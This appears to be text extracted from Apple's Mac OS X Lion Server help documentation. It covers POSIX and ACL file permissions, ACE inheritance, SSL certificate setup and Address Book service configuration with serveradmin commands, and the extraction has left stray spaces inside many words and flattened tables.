An important aspect of computer s ecurity involves granting and denying permissions. A permission is the ability to perform a specific operation, s uch as gaining acces s to data or executing code. Permissions are granted at the level of folders, files, or applications. Us e the Server app to set up file s ervice permissions. The term privileges refers to the combination of ownership and permis sions, while the term permissions refers to the permission settings that each user category can have (Read & Write, Read Only, Write Only, and None). If youre new to Mac OS X Lion and arent familiar with UNIX-based sys tems, there are differences in the way ownership and permissions are handled compared to Windows . To increase security and reliability, Mac OS X Lion sets many system folders (for example, /Library/) to be owned by the root user (literally, a user named root). You cant change or delete files and folders unless youre logged in as root. Be carefulthere are few res trictions on what you can do when you log in as root, and changes to s ystem data can cause problems. An alternative to logging in as root is to us e the sudo command. Note: The Finder calls the root user system. By default, files and folders are owned by the user who creates them. After theyre created, items keep their privileges (a combination of ownership and permis sions) even when moved, unles s the privileges are explicitly changed by their owner or an administrator. Therefore, new files and folders you create arent accessible by users if theyre created in a folder that us ers dont have privileges for. When setting up s hare points, make sure that items have the correct access privileges for the users you want to s hare them with.
Security
File permissions
About permissions
Kinds of permissions
Mac OS X Lion s upports two kinds of file and folder permiss ions: Standard Portable Operating System Interface (POSIX) permissions Access Control Lists (ACLs) Standard POSIX permis sions let you control acces s to files and folders based on three categories of users: Owner, Group, and Others. Although thes e permis sions give you s ome control over who can acces s a file or a folder, they lack the flexibility and granularity that many organizations require in dealing with complex user environments. This is where ACLs come in handy. An ACL provides an extended set of permis sions for a file or folder, and lets you s et multiple users and groups as owners . ACLs are als o compatible with Windows Server 2003, Windows XP, Windows Vis ta, and Windows 7 giving you added flexibility in a multiplatform environment.
Security
File permissions
About permissions
Standard permissions
There are four types of standard POSIX access permiss ions that you can as sign to a s hare point, folder, or file: Read & Write, Read Only, Write Only, and None. The following table shows how these permissions affect user access to shared items (files, folders, and share points).
Users can Open a shared file Copy a shared file Edit a shared file Move items to a shared folder or share point Move items from a shared folder or share point Yes No No No Read & Write Yes Yes Yes Yes Read Only Yes Yes No No Write Only No No No Yes None No No No No
Note: WebDAV has separate permis sions settings . Explicit permissions Share points and the shared items they contain (including folders and files) have separate permiss ions. If you move an item to a different folder, it keeps its permissions and doesnt adopt the permissions of the folder where you moved it. In the following illus tration, the second folder (Designs) and the third folder (Documents) were assigned permis sions different from those of their parent folders :
The user categories Owner, Group, and Others You can as sign standard POSIX access permiss ions separately to three categories of users: OwnerA user who creates an item (file or folder) on the file server is its owner and automatically has Read & Write permis sions for that folder. By default, the owner of an item and the s erver administrator are the only us ers who can change its access privileges (but you can enable a group or others to us e the item). The administrator can also transfer ownership of the shared item to another user. Note: When you copy an item to a drop box on a Mac file server, ownership of the item doesnt change. Only the owner of the
drop box or root has access to its contents. GroupYou can put us ers who need the same access to files and folders in group accounts. Only one group can be assigned access permiss ions to a shared item. For more information about creating groups, s earch Help for Us ers & Groups. OthersOthers is any us er (registered user or gues t) who can log in to the file server. Hierarchy of permissions If a user is included in more than one category of users, each of which has different permiss ions, these rules apply: Group permissions override Others permis sions. Owner permis sions override Group permis sions . For example, when a user is the owner of a s hared item and a member of the group ass igned to it, the user has the permissions ass igned to the owner. The more restrictive permiss ions always take precedence. For example, if a user belongs to a group that has No Acces s assigned to an item while the Others permis sions are set to Read & Write acces s, the item with No Acces s privilege overrides the Others setting, denying the user access to the item. Client users and permissions Users of AppleShare Client s oftware can set access privileges for files and folders they own. Users who use Windows file sharing services can als o set access privileges. Standard permission propagation The Server app lets you s pecify which standard permiss ions to propagate. For example, you can propagate only the permission for Others to all des cendants of a folder and leave the permis sions for Owner and Group unchanged. For more information, see Propagate access permiss ions.
Security
File permissions
About permissions
Access control lists (ACLs)

When standard POSIX permissions arent enough, use access control lists (ACLs). An ACL is a list of acces s control entries (ACEs), each specifying the permissions to be granted or denied to a group or us er and how thes e permis sions are propagated throughout a folder hierarchy. ACLs in Mac OS X Lion let you set file and folder acces s permis sions for multiple users and groups in addition to standard POSIX permissions . This makes it easy to set up collaborative environments with smooth file sharing and uninterrupted workflows, without compromising security. ACLs provide an extended set of permis sions for a file or folder, to give you more granularity when assigning privileges than standard permiss ions would provide. For example, rather than giving a us er full write permiss ions, you can restrict him or her to create only folders and not files. Only the Mac OS Extended volume format provides local file sys tem support for ACLs. In addition, only SMB and AFP protocols provide network file system s upport for ACLs in Windows and Apple networks , respectively. Apples ACL model supports 13 permis sions for controlling access to files and folders , as described in the following table.
Permission name Change Permissions Take Ownership Type Administration Administration Description User can change standard permissions. User can change the files or folders ownership to himself or herself. Read Attributes Read User can view the files or folders attributes (for example, name, date, and size). Read Extended Attributes Read User can view the files or folders attributes added by third-party developers. List Folder Contents (Read Data) Traverse Folder (Execute File) Read Permissions Read Read Read User can list folder contents and read files. User can open subfolders and run a program. User can view the files or folders standard
permissions using the Get Info or T erminal commands. Write Attributes Write User can change the files or folders standard attributes. Write Extended Attributes Write User can change the files or folders other attributes. Create Files (Write Data) Create Folder (Append Data) Delete Delete Subfolders and Files Write Write Write Write User can create files and change files. User can create subfolders and add data to files. User can delete file or folder. User can delete subfolders and files.
In addition to these permissions , the Apple ACL model defines four types of inheritance that specify how these permiss ions are propagated: Apply to this folder: Apply (Adminis tration, Read, and Write) permissions to this folder. Apply to child folders: Apply permiss ions to subfolders . Apply to child files: Apply permissions to the files in this folder. Apply to all descendants: Apply permiss ions to descendants. To learn how this option works with the previous two, see Access control entries (ACEs). The ACL use model The ACL use model focuses on access control at the folder level, with most ACLs applied to files as the result of inheritance. Folder-level control determines which users have acces s to the contents of a folder. Inheritance determines how a defined set of permissions and rules pas s from the container to the objects in it. Without this model, administration of acces s control would quickly become a nightmare, because you would need to create and manage ACLs on thous ands or millions of files. Controlling access to files through inheritance also frees applications from maintaining extended attributes or explicit ACEs when saving a file, because the s ystem applies inherited ACEs to files. For information about explicit ACEs, s ee Access control entries (ACEs). ACLs and standard permissions You can set ACL permiss ions for files and folders in addition to s tandard permissions. For more information about how Mac OS X Lion us es ACL and standard permiss ions to determine what users can and cannot do to a file or folder, see Access control entries (ACEs). ACL management In Mac OS X Lion, you create and manage ACLs in the Server app. The Get Info window in the Finder displays the logged-in users effective permissions. For information about setting up and managing ACLs , see Set folder acces s permis sions and Control access to a shared folder. In addition to using the Server app to set and view ACL permiss ions, you can also us e the ls and chmod command-line tools. For information, see their man pages. You define ACLs for s hare points, files, and folders using the Server app.
Security
File permissions
About permissions
Access control entries (ACEs)

An ACE is an entry in an ACL that specifies, for a group or a user, access permissions to a file or folder and the rules of inheritance. Whats stored in an ACE An ACE contains the following fields :
User or Group. An ACE stores a univers ally unique ID for a group or us er, which permits unambiguous res olution of identity. Type. An ACE supports two permiss ion types , Allow and Deny, which determine whether permiss ions are granted or denied. In the Server app, you can only set the Allow permiss ions type. You can us e the ls and chmod command-line tools to set the deny permis sions type. For information, s ee their man pages . Permission. This field s tores the s ettings for the 13 permissions supported by the Apple ACL model. Inherited. This field specifies whether the ACE is inherited from the parent folder. Applies To. This field specifies what the ACE permis sion is for. Explicit and inherited ACEs The Server app supports two types of ACEs : Explicit ACEs, which are thos e you create in an ACL. See Set folder access permissions. Inherited ACEs, which are ACEs you created for a parent folder that were inherited by a descendant file or folder. Note: Inherited ACEs cannot be edited unless you make them explicit. Understanding inheritance ACL inheritance lets you specify how permissions pass from a folder to its descendants. The Apple ACL inheritance model The Apple ACL inheritance model defines four options that you select or deselect in the Server app to control the application of ACEs (in other words, how to propagate permiss ions through a folder hierarchy):
Inheritance option Apply to this folder Apply to child folders Apply to child files Apply to all descendants Description Apply (Administration, Read, and Write) permissions to this folder Apply permissions to subfolders Apply permissions to the files in this folder Apply permissions to all descendants Note: If you want an ACE to apply to all descendants without exception, you must select the Apply to child folders and Apply to child files options in addition to this option.
Mac OS X Lion propagates ACL permissions at two well-defined times : At file or folder creation timewhen you create a file or folder, the kernel determines what permissions the file or folder inherits from its parent folder. When initiated by administrator toolsfor example, when using the Propagate Permissions option in the Server app. The following figure shows how the Server app propagates two ACEs (managers and design_team) after ACE creation. Bold text represents an explicit ACE and regular text represents an inherited ACE.
ACL inheritance combination When you set inheritance options for an ACE in the Server app, you can choos e from 12 unique inheritance combinations for propagating ACL permissions.
Inheritance Apply to this folder Apply to child files Apply to child files Apply to all descendants
Inheritance Apply to this folder Apply to child folders Apply to child files Apply to all descendants
Inheritance
Apply to this folder Apply to child folders Apply to child files Apply to all descendants
ACL permission propagation The Server app lets you force the propagation of ACLs. Although this is done automatically by the Server app, there are cases when you might want to manually propagate permiss ions: You can propagate permissions to handle exceptions. For example, you might want ACLs to apply to all descendants except for a subtree of your folder hierarchy. In this case, you define ACEs for the root folder and s et them to propagate to descendants. Then, you select the root folder of the subtree and propagate permissions to remove the ACLs from descendants of that subtree. In the following example, the items in white had their ACLs removed by manually propagating ACLs .
You can propagate permissions in order to reapply inheritance in cases where you removed a folders ACLs and decided to reapply them. You can propagate permissions to clear all ACLs at once instead of going through a folder hierarchy and manually removing ACEs . When you propagate permissions , the permissions of bundles and root-owned files and folders arent changed. For more information about how to manually propagate permissions , see Propagate access permissions. Rules of precedence Mac OS X Lion uses the following rules to control access to files and folders : Without ACEs, POSIX permis sions apply. If a file or folder has no ACEs defined for it, Mac OS X Lion applies standard POSIX permis sions . With ACEs, order is important. If a file or folder has ACEs defined for it, Mac OS X Lion starts with the first ACE in the ACL and works its way down the list until the requested permission is satisfied or denied. You can change the ACE order from the command line us ing the chmod command. Allow permiss ions are cumulative. When evaluating Allow permiss ions for a us er in an ACL, Mac OS X Lion defines the users permis sions as the union of all permissions assigned to the user, including standard POSIX permissions . After evaluating ACEs, Mac OS X Lion evaluates the standard POSIX permissions defined for the file or folder. Then, based on the evaluation of ACL and s tandard POSIX permissions, Mac OS X Lion determines the type of access a user has to a s hared file or folder.
Security
File permissions
About permissions
Permissions in practice
Mac OS X Lion combines traditional POSIX permissions with ACLs . This combination provides great flexibility and fine granularity in controlling access to files and folders . However, if youre not careful in how you assign privileges, it may be hard for you to keep track of how permissions are assigned. With 17 permiss ions, you can choose from a staggering 98,304 combinations. Add to that a sophis ticated folder hierarchy, many users and groups , and many exceptions, and you have a recipe for cons iderable confusion. The following are useful tips and advice to help you get the most out of access control in Mac OS X Lion. Manage permissions at the group level Ass ign permis sions to groups firs t, and assign permiss ions to individual users only when there is an exception. For example, you can assign all teachers in a s chool district Read and Write permissions to a s pecific share point, but deny Anne Johnson, a temporary teacher, permis sion to read a specific folder in the share points folder hierarchy. Using groups is the most efficient way of ass igning permissions. After creating groups and ass igning them permissions , you can add or remove users without reassigning permis sions. Gradually add permissions Ass ign only neces sary permissions and then add permissions only when needed. As long as you us e Allow permiss ions, Mac OS X Lion combines the permiss ions.
For example, you can assign the Students group partial reading permissions on an entire share point. Then, where needed in the folder hierarchy, you can give the group more read and write permiss ions. Use the deny rule only when necessary When Mac OS X Lion encounters a Deny permission, it stops evaluating other permiss ions the user might have for a file or folder and applies the Deny permis sion. Therefore, use Deny permissions only when absolutely necessary. Keep a record of these Deny permissions s o you can delete them when they arent needed. Always propagate permissions Inheritance is a powerful feature, s o take advantage of it. By propagating permis sions down a folder hierarchy, you s ave yourself the time and effort required to manually ass ign permis sions to des cendants. Protect applications from being modified If you share applications, make sure you set their permiss ions so that no one except a trusted few can change them. This is a vulnerability that attackers can exploit in order to introduce viruses or Trojan horses in your environment. Keep it simple You can complicate file access management unnecess arily, if youre not careful. Keep it simple. If s tandard POSIX permissions do the job, use those, but if you must use ACLs, avoid customizing permiss ions if you dont need to. Use simple folder hierarchies if feasible. A little s trategic planning can help you create effective and manageable shared hierarchies.
Security
File permissions
About permissions
Security considerations
The mos t effective method of s ecuring your network is to assign correct privileges for each file, folder, and share point you create. Restricting access to file services You can us e the Server app to restrict which us ers or groups have acces s to files, folders, and s hare points. Restricting access to everyone Be careful when creating and granting access to share points , es pecially if youre connected to the Internet. Granting access to Everyone could expos e your data to anyone on the Internet. Restricting guest access When you configure any file s ervice, you can turn on guest access. Gues ts are us ers who connect to the server anonymously without entering a user name or pas sword. Users who connect anonymous ly are res tricted to files and folders that have privileges set to Everyone. To protect your information from unauthorized access, and to prevent people from introducing software that might damage your information or equipment, take the following precautions by using File Sharing in the Server app: Depending on the controls you want to place on guest access to a share point, consider the following options: Set privileges for Everyone to None for files and folders that gues ts s houldnt access . Items with this privilege setting can be acces sed only by the items owner or group. Put all files available to gues ts in one folder or set of folders and then as sign the Read Only privilege to the Everyone category for that folder and each file in it. Ass ign Read & Write privileges to the Everyone category for a folder only if gues ts must be able to change or add items in the folder. Make sure you keep a backup copy of information in this folder. Dis able acces s to guests or anonymous users over AFP and SMB. Share individual folders instead of entire volumes. The folders should contain only those items you want to s hare.
Security
File permissions
Manage permissions
Set folder access permissions

You can set file and folder acces s permis sions with the Server app. Mac OS X Lion provides two ways to control access to files and
folders: s tandard permissions and ACL permiss ions. Standard permiss ions provide basic control. ACL permissions provide more flexibility and control, but are more complex. Set standard permissions You can us e the Server app to set standard permiss ionsRead & Write, Read Only, Write Only, or Noneto control access to a folder and its contents. You can set different permissions for one user (the owner), one group, and all other us ers who log in. You can als o set standard permiss ions on individual files. Standard permissions are als o called POSIX permissions. 1. In the Server app s idebar, s elect the server and then click Storage. 2. Select the folder whos e access permiss ions you want to change, and then choos e Edit Permissions from the Action pop-up menu. 3. To grant acces s to a different user, double-click the current us er name and enter a different user account name. As you type, the Server app looks up matching user accounts and dis plays them in lis t. Clicking a lis ted user grants access permissions to that user. 4. To grant acces s to a different group, double-click the current group name and type the name of the new group. As you type, the Server app looks up matching group accounts and displays them in a list. Clicking a listed group grants acces s permis sions to it. 5. To change the permis sion level for the user, group, or others, click the current setting in the Permission column and choose a setting from the pop-up menu. The permis sion level you set for Others applies to any user who logs in but isnt the s pecified us er or a member of the specified group. Set ACL permissions You can us e the Server app to set ACL permissions for a folder or a file. An ACL cons is ts of Acces s Control Entries (ACEs), which you can add and change. Each entry applies to a specific us er or group. For each entry, you can set 13 permissions, giving you much finer control over access than you have with standard permis sions. For example, entries in an ACL can grant delete permission s eparately from write permission, so a us er can edit a file but cant delete it. The firs t entry in the list takes precedence over the second, which takes precedence over the third, and so on. For example, if the first entry denies a user the right to edit a file, other entries that allow the same us er editing permissions are ignored. The entries in the ACL also take precedence over standard permiss ions. 1. In the Server app s idebar, s elect the server and then click Storage. 2. Select the folder or file whose access permissions you want to change, then choose Edit Permiss ions from the Action pop-up menu. 3. To add an entry, click the Add button (+) and enter the name of the user or group you want to set specific access permissions for. As you type, the Server app looks up matching user and group accounts and dis plays them in a lis t. Clicking a user or group grants acces s permis sions to the user or group. 4. To change the permis sion level for an entry, click the current s etting in the Permission column and choos e a setting from the pop-up menu.
Choice Full Control Read & Write: Read: Write: Custom: Description Has full administration, read, write, and inheritance permissions. Has full read, write, and inheritance permissions. Has full read and inheritance permissions. Has full write and inheritance permissions. Doesnt have full administration, read, write, or inheritance permissions.
By default, each new entry has full read and inheritance permissions. 5. To change detailed permission s ettings for an entry, click the disclosure triangle next to the entry, optionally click the additional disclosure triangles that appear, and s elect or deselect permission s ettings. For information about the detailed permission settings , see Access control lists (ACLs) and Access control entries (ACEs).
RELATED TOPIC
Remove an ACL entry
Security
File permissions
Manage permissions
Propagate access permissions

You can us e the Server app to propagate a folders permiss ions to all the folders and files it contains . You can s pecify which standard permiss ions to propagate: owner name, group name, owner permiss ions, group permissions, and permissions for others. You can propagate a folders complete ACL, but you cant propagate individual entries that cons titute the ACL.
1. In the Server app s idebar, s elect the server and then click Storage. 2. Select the folder whos e access permiss ions you want to propagate, and then choose Propagate Permissions from the Action pop-up menu. 3. Select the permiss ions you want to propagate, and then click OK. Important: Propagation begins as soon as you click OK, and you cant undo propagation. Before clicking OK, make sure you select the folder and permiss ion settings you intend.
RELATED TOPICS
Remove a folders inherited ACL entries Remove an ACL entry
Security
File permissions
Manage permissions
Remove an ACL entry

You can us e the Server app to remove ACL permis sion entries youve added. Each entry defines a us ers or groups access permission to a folder or file.
1. In the Server app s idebar, s elect the server and then click Storage. 2. Select the folder or file whose access permissions you want to change, and then choose Edit Permissions from the Action pop-up menu. 3. To remove an entry from the permission list, select the entry and click the Delete button ().
RELATED TOPIC
Security
File permissions
Manage permissions
Sort an ACL canonically

When sorting an ACL canonically, the Server app firs t lis ts all entries that deny permiss ion, then the entries that grant permission. ACL entries that deny permis sion have a permission type of Deny. Entries that grant permission have a permiss ion type of Allow. All ACL entries created with the Server app are the Allow type. Permiss ions of the Deny type can exist on disks used with Mac OS X v10.6 or earlier. Permissions of the Deny type can be created on Lion Server dis ks by using the chmod command-line tool. For information about chmod, s ee its man page.
1. In the Server app s idebar, s elect the server, and then click Storage. 2. Select the folder or file whose ACL list you want to sort, and then choos e Edit Permissions from the Action pop-up menu. 3. Choose Sort Access Control Lis t Canonically from the Action pop-up menu in the Edit Permis sions dialog.
RELATED TOPIC
Security
File permissions
Manage permissions
Remove a folders inherited ACL entries

If you dont want inherited ACL entries to apply to a folder or file, you can remove those entries using the Server app. Unlike explicit ACL entries, inherited ACL entries appear dimmed in the Server apps dialog for editing acces s permis sions.
1. In the Server app s idebar, s elect the server and then click Storage. 2. Select the folder or file whose access permissions you want to change, and then choose Edit Permissions from the Action pop-up menu. 3. Choose Remove Inherited Entries from the Action pop-up menu in the Edit Permis sions dialog.
RELATED TOPICS
Apply ACL inheritance to folders and files Make inherited ACL entries explicit Set folder access permissions
Security
File permissions
Manage permissions
Make inherited ACL entries explicit

If you want to change inherited ACL entries for a folder or file, you must make the inherited entries explicit.
1. In the Server app s idebar, s elect the server and then click Storage. 2. Select the folder or file whose access permissions you want to change, and then choose Edit Permissions from the Action pop-up menu. 3. Choose Make Inherited Entries Explicit from the Action pop-up menu in the Edit Permissions dialog. You can now edit the ACL entries.
RELATED TOPICS
Remove a folders inherited ACL entries Set folder access permissions
Security
File permissions
Manage permissions
Apply ACL inheritance to folders and files

If you removed all the ACL entries from a folder or file and want to res tore inherited entries, you can use the Server app to propagate the parent folders ACL. All des cendants of the parent folder inherit the propagated ACL.
1. In the Server sidebar, select the server and then click Storage. 2. Select the parent folder of the item whos e ACL inheritance you want to restore, and then choos e Propagate Permiss ions from the Action pop-up menu.
3. Select the Access Control Lis t option, deselect all other options, and then click OK. Important: Propagation begins as soon as you click OK, and you cant undo propagation. Before clicking OK, make sure you select the folder and permiss ion settings you intend.
RELATED TOPIC
Security
File permissions
Manage permissions
Common folder permissions

When sharing files and folders between computers, you can set custom permiss ions to grant or restrict acces s to those files and folders. Before you begin setting custom file and folder permissions, you might want to investigate how the file and folder are to be shared, who has access , and what type of access you want us ers to have. A recommended way to manage file and folder permis sions is to create groups of us ers who share the same privileges. Depending on your network environment, you can us e standard permiss ions (als o referred to as POSIX permissions), ACL, or both to manage file or folder access . The following table shows examples of the standard permiss ions and ACL permissions necessary to configure s ome common folder-sharing settings.
Folder Drop box ACL (Ev eryone) Permission Type: Allow Select the following checkboxes: Traverse Folder Create Files Create Folder All inheritance options Backup share Permission Type: Allow Select the following checkboxes: List Folder Contents Create Files Create Folder Set the owner to root and set the group to admin. Owner: read, write, execute Group: read only Other: read only POSIX Owner: read, write, execute Group: read, write, execute Other: write Set the owner to root and set the group to admin.
Owner: read, write, execute Group: read, write, execute Other: no permissions
Home folder
Permission Type: Deny Delete Apply to this folder Apply to all descendants
Security
SSL Certificates
Replace certificates
If you've as signed a certificate to a particular service, or to all services as a group, you can replace those certificates. You might replace the default self-signed certificate with one that's been s igned by a third-party, or you might need to replace an expired certificate. See Obtaining a Signed Certificate . If you receive a s igned certificate from a third-party, it should have an extension of .cer, .crt, or .p12.
RELATED INFORMATION
Security
SSL Certificates
Create a self-signed certificate

If your server does nt have an SSL certificate or if you need another one, start by creating a self-s igned certificate.
1. Select the server under Hardware in the Server app s idebar. 2. Click Settings and then click the Edit button at the right of SSL Certificate. 3. From the Action pop-up menu, choose Manage Certificates. 4. Click the Add button (+) and choose Create Self-Signed Certificate from the pop-up menu. 5. In the Name field of the Certificate Ass is tant, enter your s erver's fully qualified host name (for example, server.example.com) and click Continue. Leave the other settings unchanged. Identity Type s hould be Self Signed Root, Certificate Type s hould be SSL Server, and Let me override defaults s hould be deselected. You can choos e the new self-s igned certificate for the server. For information, see Using an SSL certificate. You can also use the new self-signed certificate to reques t a signed certificate from a certificate authority. For instructions , see Obtain a signed certificate.
Security
SSL Certificates
Import a certificate identity

If you have files containing an SSL certificate and matching private key, you can import them and then use the certificate to secure services provided by your s erver. The SSL keys and certificates must be in Privacy Enhanced Mail (PEM) format. If your certificates and keys arent in PEM format, you must convert them.
1. In the Finder, locate the files containing the certificate and matching private key, and put the files where you can s ee them while using Server Preferences (for example, on the des ktop). 2. In the Server app, select your server's name under Hardware in the Server app s idebar. 3. In the Settings pane, click the Edit button at the right of SSL Certificate. 4. From the Action pop-up menu, choose Manage Certificates. 5. Click + and then choose Import a Certificate Identity from the menu. 6. Drag the files containing the certificate and private key to the middle of the dialog. 7. Click the Import button and if prompted, enter the private key pass phrase.
Security
SSL Certificates
Obtain a CAsigned certificate

If your server requires a s igned SSL certificate, use a self-signed certificate to reques t a signed certificate from an external certificate authority (CA). To obtain a s igned certificate from a CA, you need a self-s igned certificate. For instructions on creating a self-s igned certificate, see Create a s elf-signed certificate. You can obtain a valid s igned certificate by us ing the servers self-signed certificate to generate a certificate signing request (CSR) file, which you send to a known CA. If your request satisfies the authority, it generates and sends you a signed certificate. There is usually a fee involved with this service.
1. Select the server under Hardware in the Server app s idebar. 2. Click Settings and then click the Edit button at the right of SSL Certificate.
3. From the Action pop-up menu, choose Manage Certificates. 4. In the Manage Certificates s heet, s elect the self-s igned certificate you want to use to generate the CSR. 5. From the Action pop-up menu, choose Generate Certificate Signing Request (CSR). 6. Save the CSR file. Some certificate authorities ask you to enter the CSR text in a field on a webpage instead of uploading a file. In that case, you can copy and paste the text to the CA's website. 7. Upload the CSR file to a CA following the instructions on their webs ite. On the CA's website, look for SSL Certificates. You can use the CA of your choice. Here are a few CAs : Thawte, Inc. (www.thawte.com) VeriSign, Inc. (www.verisign.com) Comodo Group, Inc. (www.comodo.com) After receiving your signed certificate from the CA, you can use it to replace your self-signed certificate. For information, see Use an SSL certificate.
Security
SSL Certificates
Use an SSL certificate

Your server can use an SSL certificate to provide additional security for s ervices . The s erver can us e an SSL certificate to identify itself electronically and communicate s ecurely with users computers and other servers on the local network and the Internet. The SSL certificate provides additional security for Addres s Book, iCal, iChat, mail, and web services. Thes e s ervices can us e the certificate to securely encrypt and decrypt data they s end to and receive from applications on users computers. You can us e the s elf-signed certificate created for your s erver when you set it up, or a s elf-signed certificate you created, but users applications wont trust these and will display mes sages asking if the user trus ts your certificate. Using a signed certificate relieves us ers from the uncertainty and tedium of manually accepting your certificate in these mess ages. A man-in-the-middle spoofing attack is pos sible with a self-s igned certificate, but not with a signed certificate, and that means users can trust the services they access.
RELATED INFORMATION
Obtain a CAs igned certificate Replace certificates
User collaboration serv ices
Address Book serv ice
About Address Book serv ice
Provide centralized contact information

Address Book service provides a consolidated, s erver-hosted contact lis t. Address Book Server is the contact service for Lion Server. Built on open s tandard protocols, Address Book Server provides a simpletoimplement, secure, hosted address book solution. You can acces s personal and group contacts across multiple
computers within a workgroup, a s mall bus iness , or a large corporation. Address Book Server is the Lion Serverhosted contact management solution for your organizations needs. It provides the following: Access to client addres s books anywhere there's a Web connection Integration with Address Book, Mail, iCal, and iChat in Mac OS X vers ion 10.6 and later Compatibility with any applications that use the s tandard Address Book framework vCard caching for offline acces s Address Book Server provides secure, centralized storage for contact infomation. The server uses the CardDAV protocol, based on the widely us ed WebDAV protocol. It stores contacts as standard vCards for easy sharing. For more information about which clients can access Address Book Server, see Address Book Server client applications. Address Book Server also lets you access contact information in your organization's directory by including directory us ers in your Address Book search res ults . Before starting Address Book service, you may need to update your network's DNS records, if needed. Start Address Book service 1. In the Server app s idebar, s elect the service you want to start. 2. Click the On/Off switch to turn on the service. 3. If a dialog asks whether you want to allow Internet acces s to the s ervice you turned on, click Allow to configure your AirPort device and make the service acces sible to Internet users. Click Dont Allow if you dont want the service to be access ible to computers on the Internet, or if youre not sure. You can change Internet acces s to s ervices later by selecting your AirPort device in the Server sidebar. For more information, see Manage AirPort port mapping and Wi-Fi login. The dialog appears only if your AirPort device is listed in the Server sidebar and you turned on a service that the Server app can manage on your AirPort device.Thes e services include Address Book, iCal, iChat, Mail, and Web. If you have an Internet router that is nt lis ted in the Server s idebar, you can configure it to allow Internet access to services. This process is called port forwarding or port mapping. For Information, see Router port mapping. Add users, if needed 1. In the Users pane of the Server app, click the Add button (+). 2. In the Full Name field, enter the users name. The name can be up to 255 characters (or as few as 85 Japanese characters), and can include spaces . 3. In the Account Name field, enter the us ers short name. If you dont want to use the generated short name, enter a different short name. After the account is created, you cant change this s hort name. The short name typically is eight or fewer characters, but can be up to 255 Roman characters. Use only the characters a through z, A through Z, 0 through 9, . (period), _ (underscore), or - (hyphen). Note: If a user has a s hort name on a Mac, try to use the same short name for the users account on the s erver. Having the same s hort name helps with the users access to services. 4. Enter the users pas sword in the Pass word and Verify fields . You can use Pas sword Ass is tant to help you choose a pass word. Click the button at the right of the Pass word field to see how s ecure the password is. The us er can change this password in the Users & Groups pane of System Preferences on the us ers computer. 5. To associate a picture with the user account, click the silhouette and select a standard picture, or click Edit Picture for a customized picture. When you click Edit Picture, you can take a picture with your computers camera or choos e a graphic file on your computer. After taking or choos ing a picture, you can drag the picture to pan it, or us e the slider to zoom it. When you finish customizing
the picture, click Set. 6. Click Done to create the user account. Allow directory searches Directory contact s earching lets Address Book Server clients search the directory services Addres s Book Server is bound to. This can include Lion Serverbased computers that are configured to us e Open Directory. It can als o include existing LDAP or Active Directory implementation. When directory searches are enabled, Address Book Server us ers can s earch their own contacts, the directory of us ers , and other shared directory contacts with a single search. 1. In the Server app, select the Address Book pane. 2. Select Include directory contacts in s earch.
Configuration tools
Address Book Server uses two front-end tools for configuration. serveradmin Server App In each case, the front-end tools reads from a configuration plis t file (/etc/caldavd/carddavd.plist) to set service parameters. The plis t file is an XML property list that s pecifies server options such as: The network TCP port to bind to Whether to use SSL The names and locations of support files
Address Book configuration options

You can customize Address Book Server settings us ing serveradmin for advanced control.
Setting Directory Searching Description T his allows clients bound to Address Book Server to get contacts and groups from directory servers that Address Book Server is bound to. T o change this setting, see Configure directory search for Address Book service MaxCollectionsPerHome T his is the maximum number of address books a user can create. T o change this setting, see Change Address Book service user quotas. MaxResourcesPerCollection T his is the maximum number of contacts that a user can create in each address book. T o change this setting, see Change Address Book service user quotas. MaxResourceSize T his is the maximum size in bytes of each contact. T o change this setting, see Change Address Book service user quotas. Authentication T his is the authentication method required for address book access. T o change this setting, see Choose and enable secure authentication for Address Book server. Host Name T his is the fully qualified domain name in DNS. It should be in the reverse lookup domain as well.
T o change this setting, see Change the Address Book server host name. SSL T his determines whether or not to use SSL encryption of network traffic. T o change this setting, see Enable secure network traffic for Address Book server. HTT P Port Number T his is the port that Address Book Server uses for connections. The default port is 8800. T o change this setting, see Change the Address Book server port number. Log Level T his is the degree of granularity with which Address Book Server logs are recorded. The default log level is Info. T o change this setting, see Change the Address Book server logging level.
Start or stop Address Book service

From the command line, use serveradmin to start and stop service.
sudo serveradmin start addressbook sudo serveradmin stop addressbook
Address Book Server client applications

Several clients can find users and groups in an Address Book server. Apple applications The following Apple applications can us e Lion Servers Address Book Server. Address Book 5.0 or later. The version of Address Book that s hips with Mac OS X v10.6 has built-in support for CardDAV and Address Book Server. Mail 4.0 or later. The version of Mail that ships with Mac OS X v10.6 has built-in support for Address Book Server, which is configured in the Composing pane of Mail preferences. iChat 5.0 or later. The version of iChat that ships with Mac OS X v10.6 has built-in support for finding users and groups with Address Book Server. Contacts app for iOS 4.0 or later. The vers ion of Contacts that ships with iOS 4.0 has built-in support for CardDAV and Address Book Server. Third-Party applications Any applications that us e the Addres s Book framework also inherit support for Address Book Server, if the computer is bound to a server that has Address Book Server. For a client to us e Addres s Book Server, the client must support the CardDAV protocol. Any application that supports the CardDAV protocol works with Addres s Book Server, although it might not take advantage of Mac OS Xspecific additions to the CardDAV protocol.
RELATED TOPIC
Provide centralized contact information
Configure Address Book
Configure directory search for Address Book service
Directory searching lets Address Book service clients search the directory services that Address Book service is bound to. This can include Mac OS X Server v10.5 implementations that are configured with the Directory application. It can als o include any existing LDAP or Active Directory implementations .
1. Use serveradmin via the Terminal app to change the EnableSearchAddres sBook flag from false to true. sudo serveradmin settings addressbook:EnableSearchAddressBook = "<true>" The default value for <setting> is false. 2. Enable either (or both) s earching of us er accounts available available to Address Book Server or public shared contacts (as designated in Mac OS X Server v10.5). a. To s hare the the user accounts , enter: sudo serveradmin settings addressbook:DirectoryAddressBook:params:queryUserRecords = "true" b. To s hare the contacts, enter: sudo serveradmin settings addressbook:DirectoryAddressBook:params:queryPeopleRecords = "true" 3. Res tart Addres s Book s ervice. sudo serveradmin stop addressbook sudo serveradmin start addressbook
Change the Address Book server host name

After setting up Address Book server, you can change the hos t name of Address Book server. It should be a fully qualified domain name matched with a reverse lookup record. Make the needed changes to your firewall, to allow network access to the server.
1. Use serveradmin via the Terminal app to change the setting. sudo serveradmin settings addressbook:ServerHostName = "<hostname>" The default value for <hostname> is blank, meaning it is the hostname of the current server. Command example: sudo serveradmin settings addressbook:ServerHostName = "chatter.example.com" 2. Res tart Addres s Book s ervice. sudo serveradmin stop addressbook sudo serveradmin start addressbook
Change the Address Book server port number

You can change the port number clients will us ed to connect to Addres s Book Server. When setting up Address Book service, it is set to use TCP port 8800. If you want to change the port, you can do so with the command line. Make the appropriate changes to your firewall, to allow network access to the s erver.
